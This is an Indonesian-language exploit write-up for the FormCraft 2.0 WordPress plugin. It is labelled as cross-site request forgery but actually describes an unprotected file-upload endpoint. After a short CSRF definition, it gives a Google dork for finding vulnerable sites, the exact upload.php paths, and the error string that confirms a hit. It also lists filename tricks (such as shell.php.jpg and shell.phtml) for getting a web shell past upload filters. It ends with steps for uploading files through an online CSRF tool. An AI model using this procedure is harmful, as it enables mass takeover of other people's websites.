WordPress 5.0.4 FormCraft Plugins 2.0 - Cross Site Request Forgery

Assalamualaikum.

He tong !

Pengenalan CSRF : Cross-site request forgery, dikenal juga dengan one click attack atau session riding disingkat dengan CSRF atau XSRF, merupakan bentuk eksploitasi website yang dieksekusi atas wewenang korban, tanpa dikehendakinya. CSRF menipu web site melalui request dari user yang dipercaya. Serangan bekerja melalui link atau script pada halaman site yang diakses user. Link tersebut dapat berupa gambar/image yang terhubung ke website tertentu. Jika website menyimpan informasi otentikasi dalam sebuah cookie yang belum expire, maka dengan melakukan klik ke link tersebut akan menyebabkan website diakses menggunakan cookie user yang melakukan klik. Dengan kata lain, penyerang menipu browser user untuk mengirimkan HTTP requests ke website target.

Sumber : https://mti.binus.ac.id/2018/07/11/cross-site-request-forgery/

=====================================================
Google Dork : > inurl: /wp-content/plugins/formcraft/

Exploit : > /wp-content/plugins/formcraft/file-upload/server/php/upload.php
               >  /wp-content/plugins/formcraft/file-upload/server/content/upload.php 

Vulnerability Error > "failed":"No file found 2"}

Bypass Shell : shell.php.jpg | shell.jpg;.php | shell.php;.gif | shell.phtml | Terusno Dewe.

=====================================================

Dorking Dolo :v

Masukkan Exploit

Example : 127.0.0.1/[PATH]/wp-content/plugins/formcraft/file-upload/server/php/upload.php

masukkan Ke CSRF Online :v
Target yg tadi, sama Post Type diisi files[] 
Post Type ini beda2, tergantung dari site tsb. Lalu klik Kunci !

Lalu Pilih File yang mau Di upload, next Klik upload !

File Uploaded !

Cukup sekian, Pertemuan hari ini
Stay In Here, n Good Bye !



Wassalamualaikum..